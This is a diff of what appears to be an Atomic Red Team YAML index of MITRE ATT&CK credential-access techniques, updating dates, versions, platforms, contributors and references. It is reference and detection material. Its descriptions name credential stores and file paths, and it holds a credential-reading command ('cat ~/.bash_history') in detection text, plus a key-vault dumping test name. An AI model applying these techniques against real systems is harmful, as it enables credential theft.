-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
-      type: attack-pattern
-      created: '2020-02-12T18:57:36.041Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1555.003
-        url: https://attack.mitre.org/techniques/T1555/003
-      - source_name: Talos Olympic Destroyer 2018
-        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
-        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
-          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
-      - source_name: Microsoft CryptUnprotectData April 2018
-        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
-        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
-          June 18, 2019.
-      - source_name: Proofpoint Vega Credential Stealer May 2018
-        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
-        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
-          in targeted campaign . Retrieved June 18, 2019.
-      - source_name: FireEye HawkEye Malware July 2017
-        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
-        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
-          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
-          2019.
-      - source_name: GitHub Mimikittenz July 2016
-        url: https://github.com/putterpanda/mimikittenz
-        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
-          Retrieved June 20, 2019.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-15T14:13:45.294Z'
       name: 'Credentials from Password Stores: Credentials from Web Browsers'
       description: "Adversaries may acquire credentials from web browsers by reading
         files specific to the target browser.(Citation: Talos Olympic Destroyer 2018)
@@ -45598,6 +46324,12 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_contributors:
+      - Ryan Benson, Exabeam
+      - Barry Shteiman, Exabeam
+      - Sylvain Gil, Exabeam
+      - RedHuntLabs, @redhuntlabs
+      x_mitre_deprecated: false
       x_mitre_detection: 'Identify web browser files that contain credentials such
         as Google Chrome’s Login Data database file: <code>AppData\Local\Google\Chrome\User
         Data\Default\Login Data</code>. Monitor file read events of web browser files
@@ -45607,23 +46339,58 @@ credential-access:
         reading web browser process memory, utilizing regular expressions, and those
         that contain numerous keywords for common web applications (Gmail, Twitter,
         Office365, etc.).'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Process: Process Access'
       - 'File: File Access'
       - 'Process: OS API Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--58a3e6aa-4453-4cc8-a51f-4befe80b31a8
+      created: '2020-02-12T18:57:36.041Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1555/003
+        external_id: T1555.003
+      - source_name: GitHub Mimikittenz July 2016
+        description: Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz.
+          Retrieved June 20, 2019.
+        url: https://github.com/putterpanda/mimikittenz
+      - source_name: Talos Olympic Destroyer 2018
+        description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+          Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+        url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+      - source_name: Microsoft CryptUnprotectData April 2018
+        description: Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved
+          June 18, 2019.
+        url: https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata
+      - source_name: Proofpoint Vega Credential Stealer May 2018
+        description: Proofpoint. (2018, May 10). New Vega Stealer shines brightly
+          in targeted campaign . Retrieved June 18, 2019.
+        url: https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign
+      - source_name: FireEye HawkEye Malware July 2017
+        description: Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential
+          Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18,
+          2019.
+        url: https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1555.003
     atomic_tests: []
   T1557.003:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-09-12T19:46:04.759Z'
       name: DHCP Spoofing
       description: "Adversaries may redirect network traffic to adversary-owned systems
         by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting
@@ -45660,23 +46427,23 @@ credential-access:
         phase_name: credential-access
       - kill_chain_name: mitre-attack
         phase_name: collection
+      x_mitre_contributors:
+      - Alex Spivakovsky, Pentera
+      - Andrew Allen, @whitehat_zero
+      x_mitre_deprecated: false
       x_mitre_detection: 'Monitor network traffic for suspicious/malicious behavior
         involving DHCP, such as changes in DNS and/or gateway parameters. Additionally,
         monitor Windows logs for Event IDs (EIDs) 1341, 1342, 1020 and 1063, which
         specify that the IP allocations are low or have run out; these EIDs may indicate
         a denial of service attack.(Citation: dhcp_serv_op_events)(Citation: solution_monitor_dhcp_scopes)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Linux
       - Windows
       - macOS
-      x_mitre_is_subtechnique: true
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Alex Spivakovsky, Pentera
-      - Andrew Allen, @whitehat_zero
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
       - 'Application Log: Application Log Content'
@@ -45709,21 +46476,20 @@ credential-access:
       - source_name: solution_monitor_dhcp_scopes
         description: 'Shoemaker, E. (2015, December 31). Solution: Monitor DHCP Scopes
           and Detect Man-in-the-Middle Attacks with PRTG and PowerShell. Retrieved
-          March 7, 2022.'
-        url: https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
+          September 12, 2024.'
+        url: https://web.archive.org/web/20231202025258/https://lockstepgroup.com/blog/monitor-dhcp-scopes-and-detect-man-in-the-middle-attacks/
       - source_name: w32.tidserv.g
         description: Symantec. (2009, March 22). W32.Tidserv.G. Retrieved January
           14, 2022.
         url: https://web.archive.org/web/20150923175837/http://www.symantec.com/security_response/writeup.jsp?docid=2009-032211-2952-99&tabid=2
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1552.004:
     technique:
-      modified: '2023-04-12T23:52:08.194Z'
+      modified: '2024-10-04T11:31:56.622Z'
       name: 'Unsecured Credentials: Private Keys'
       description: "Adversaries may search for private key certificate files on compromised
         systems for insecurely stored credentials. Private cryptographic keys and
@@ -45734,7 +46500,7 @@ credential-access:
         as <code>~/.ssh</code> for SSH keys on * nix-based systems or <code>C:&#92;Users&#92;(username)&#92;.ssh&#92;</code>
         on Windows. Adversary tools may also search compromised systems for file extensions
         relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation:
-        Palo Alto Prince of Persia)\n\nWhen a device is registered to Azure AD, a
+        Palo Alto Prince of Persia)\n\nWhen a device is registered to Entra ID, a
         device key and a transport key are generated and used to verify the device’s
         identity.(Citation: Microsoft Primary Refresh Token) An adversary with access
         to the device may be able to export the keys in order to impersonate the device.(Citation:
@@ -45768,7 +46534,7 @@ credential-access:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '1.1'
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Access'
@@ -45796,7 +46562,7 @@ credential-access:
       - source_name: Kaspersky Careto
         description: Kaspersky Labs. (2014, February 11). Unveiling “Careto” - The
           Masked APT. Retrieved July 5, 2017.
-        url: https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
+        url: https://web.archive.org/web/20141031134104/http://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf
       - source_name: Microsoft Primary Refresh Token
         description: Microsoft. (2022, September 9). What is a Primary Refresh Token?.
           Retrieved February 21, 2023.
@@ -45807,14 +46573,13 @@ credential-access:
         url: https://en.wikipedia.org/wiki/Public-key_cryptography
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.004
     atomic_tests: []
   T1557.001:
     technique:
-      modified: '2023-04-25T14:00:00.188Z'
+      modified: '2022-10-25T15:46:55.393Z'
       name: 'Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay'
       description: "By responding to LLMNR/NBT-NS network traffic, adversaries may
         spoof an authoritative source for name resolution to force communication with
@@ -45922,12 +46687,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.0.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1557.001
     atomic_tests: []
   T1003.001:
     technique:
-      modified: '2023-12-27T17:57:20.003Z'
+      modified: '2024-08-13T13:52:45.379Z'
       name: 'OS Credential Dumping: LSASS Memory'
       description: |
         Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).
@@ -45964,6 +46728,7 @@ credential-access:
       - Edward Millington
       - Ed Williams, Trustwave, SpiderLabs
       - Olaf Hartong, Falcon Force
+      - Michael Forret, Quorum Cyber
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for unexpected processes interacting with LSASS.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access LSASS.exe by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details are stored. Credential dumpers may also use methods for reflective [Process Injection](https://attack.mitre.org/techniques/T1055) to reduce potential indicators of malicious activity.
@@ -45976,7 +46741,7 @@ credential-access:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.4'
+      x_mitre_version: '1.5'
       x_mitre_data_sources:
       - 'Process: Process Access'
       - 'Windows Registry: Windows Registry Key Modification'
@@ -46026,12 +46791,11 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.001
     atomic_tests: []
   T1110.003:
     technique:
-      modified: '2024-03-07T14:33:34.201Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Brute Force: Password Spraying'
       description: |-
         Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. (Citation: BlackHillsInfosec Password Spraying)
@@ -46057,6 +46821,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Microsoft Threat Intelligence Center (MSTIC)
       - John Strand
@@ -46072,18 +46837,18 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
       - Linux
       - macOS
-      - Google Workspace
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Application Log: Application Log Content'
@@ -46110,14 +46875,11 @@ credential-access:
         url: https://www.us-cert.gov/ncas/alerts/TA18-086A
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1110.003
     atomic_tests: []
   T1056.003:
     technique:
-      modified: '2023-03-30T21:01:46.711Z'
+      modified: '2024-10-15T16:43:43.849Z'
       name: Web Portal Capture
       description: |-
         Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service.
@@ -46128,13 +46890,13 @@ credential-access:
         phase_name: collection
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: File monitoring may be used to detect changes to files in
         the Web directory for organization login pages that do not match with authorized
         updates to the Web server's content.
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
@@ -46148,6 +46910,7 @@ credential-access:
       id: attack-pattern--69e5226d-05dc-4f15-95d7-44f5ed78d06e
       created: '2020-02-11T18:59:50.058Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
       external_references:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1056/003
@@ -46158,12 +46921,12 @@ credential-access:
         url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1003.005:
     technique:
-      modified: '2024-04-18T23:47:54.553Z'
+      modified: '2024-10-15T14:18:59.123Z'
       name: 'OS Credential Dumping: Cached Domain Credentials'
       description: "Adversaries may attempt to access cached domain credentials used
         to allow authentication to occur in the event a domain controller is unavailable.(Citation:
@@ -46238,7 +47001,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1003.005
     atomic_tests: []
   T1558.001:
@@ -46284,7 +47046,7 @@ credential-access:
         url: https://gallery.technet.microsoft.com/scriptcenter/Kerberos-Golden-Ticket-b4814285
         description: Microsoft. (2015, March 24). Kerberos Golden Ticket Check (Updated).
           Retrieved February 27, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2020-11-05T16:07:03.779Z'
       name: 'Steal or Forge Kerberos Tickets: Golden Ticket'
       description: "Adversaries who have the KRBTGT account password hash may forge
         Kerberos ticket-granting tickets (TGT), also known as a golden ticket.(Citation:
@@ -46319,16 +47081,14 @@ credential-access:
       - 'Logon Session: Logon Session Metadata'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1558.001
     atomic_tests: []
   T1649:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal or Forge Authentication Certificates
       description: |-
-        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
+        Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Entra ID device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview)
 
         Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files)(Citation: APT29 Deep Look at Credential Roaming), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned)
 
@@ -46338,21 +47098,23 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_contributors:
+      - Tristan Bennett, Seamless Intelligence
+      - Lee Christensen, SpecterOps
+      - Thirumalai Natarajan, Mandiant
+      x_mitre_deprecated: false
       x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Windows
       - Linux
       - macOS
-      - Azure AD
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_version: '1.1'
-      x_mitre_contributors:
-      - Tristan Bennett, Seamless Intelligence
-      - Lee Christensen, SpecterOps
-      - Thirumalai Natarajan, Mandiant
+      - Identity Provider
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Application Log: Application Log Content'
@@ -46401,33 +47163,11 @@ credential-access:
         url: https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1649
     atomic_tests: []
   T1552.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
-      type: attack-pattern
-      created: '2020-02-04T13:02:11.685Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.003
-        url: https://attack.mitre.org/techniques/T1552/003
-      - url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
-        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
-          DA, the OS X Way. Retrieved July 3, 2017.
-        source_name: External to DA, the OS X Way
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:24:04.912Z'
       name: 'Unsecured Credentials: Bash History'
       description: 'Adversaries may search the bash command history on compromised
         systems for insecurely stored credentials. Bash keeps track of the commands
@@ -46442,25 +47182,43 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: Monitoring when the user's <code>.bash_history</code> is
         read can help alert to suspicious activity. While users do typically rely
         on their history of commands, they often access this history through other
         utilities like "history" instead of commands like <code>cat ~/.bash_history</code>.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8187bd2a-866f-4457-9009-86b0ddedffa3
+      created: '2020-02-04T13:02:11.685Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/003
+        external_id: T1552.003
+      - source_name: External to DA, the OS X Way
+        description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+          DA, the OS X Way. Retrieved September 12, 2024.
+        url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.003
     atomic_tests: []
   T1552.001:
     technique:
-      modified: '2024-04-15T21:33:00.213Z'
+      modified: '2024-10-15T14:28:43.639Z'
       name: 'Unsecured Credentials: Credentials In Files'
       description: |-
         Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
@@ -46534,7 +47292,6 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1552.001
     atomic_tests: []
   T1606.001:
@@ -46596,11 +47353,10 @@ credential-access:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1528:
     technique:
-      modified: '2024-03-24T19:41:54.832Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Steal Application Access Token
       description: "Adversaries can steal application access tokens as a means of
         acquiring credentials to access remote systems and resources.\n\nApplication
@@ -46649,6 +47405,7 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Suzy Schapperle - Microsoft Azure Red Team
       - Shailesh Tiwary (Indian Army)
@@ -46657,6 +47414,7 @@ credential-access:
       - Saisha Agrawal, Microsoft Threat Intelligent Center (MSTIC)
       - Ram Pliskin, Microsoft Azure Security Center
       - Jack Burns, HubSpot
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Administrators should set up monitoring to trigger automatic alerts when policy criteria are met. For example, using a Cloud Access Security Broker (CASB), admins can create a “High severity app permissions” policy that generates alerts if apps request high severity permissions or send permissions requests for too many users.
@@ -46667,13 +47425,14 @@ credential-access:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - SaaS
-      - Office 365
-      - Azure AD
-      - Google Workspace
       - Containers
-      x_mitre_version: '1.3'
+      - IaaS
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Modification'
       - 'User Account: User Account Modification'
@@ -46729,9 +47488,6 @@ credential-access:
         url: https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1528
     atomic_tests:
     - name: Azure - Dump All Azure Key Vaults with Microburst
@@ -46805,37 +47561,7 @@ credential-access:
         elevation_required: true
   T1552.006:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
-      type: attack-pattern
-      created: '2020-02-11T18:43:06.253Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1552.006
-        url: https://attack.mitre.org/techniques/T1552/006
-      - source_name: Microsoft GPP 2016
-        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
-        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
-          March 9, 2020.
-      - url: https://msdn.microsoft.com/library/cc422924.aspx
-        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
-          11, 2018.
-        source_name: Microsoft GPP Key
-      - url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
-        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
-          Retrieved April 11, 2018.
-        source_name: Obscuresecurity Get-GPPPassword
-      - description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
-          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
-        url: https://adsecurity.org/?p=2288
-        source_name: ADSecurity Finding Passwords in SYSVOL
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-08-15T13:21:22.734Z'
       name: 'Unsecured Credentials: Group Policy Preferences'
       description: |
         Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts.(Citation: Microsoft GPP 2016)
@@ -46852,25 +47578,54 @@ credential-access:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: credential-access
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor for attempts to access SYSVOL that involve searching
         for XML files. \n\nDeploy a new XML file with permissions set to Everyone:Deny
         and monitor for Access Denied errors.(Citation: ADSecurity Finding Passwords
         in SYSVOL)"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'File: File Access'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e
+      created: '2020-02-11T18:43:06.253Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1552/006
+        external_id: T1552.006
+      - source_name: Obscuresecurity Get-GPPPassword
+        description: Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell.
+          Retrieved April 11, 2018.
+        url: https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html
+      - source_name: Microsoft GPP 2016
+        description: Microsoft. (2016, August 31). Group Policy Preferences. Retrieved
+          March 9, 2020.
+        url: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/dn581922(v%3Dws.11)
+      - source_name: Microsoft GPP Key
+        description: Microsoft. (n.d.). 2.2.1.1.4 Password Encryption. Retrieved April
+          11, 2018.
+        url: https://msdn.microsoft.com/library/cc422924.aspx
+      - source_name: ADSecurity Finding Passwords in SYSVOL
+        description: Sean Metcalf. (2015, December 28). Finding Passwords in SYSVOL
+          & Exploiting Group Policy Preferences. Retrieved February 17, 2020.
+        url: https://adsecurity.org/?p=2288
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1552.006
     atomic_tests: []
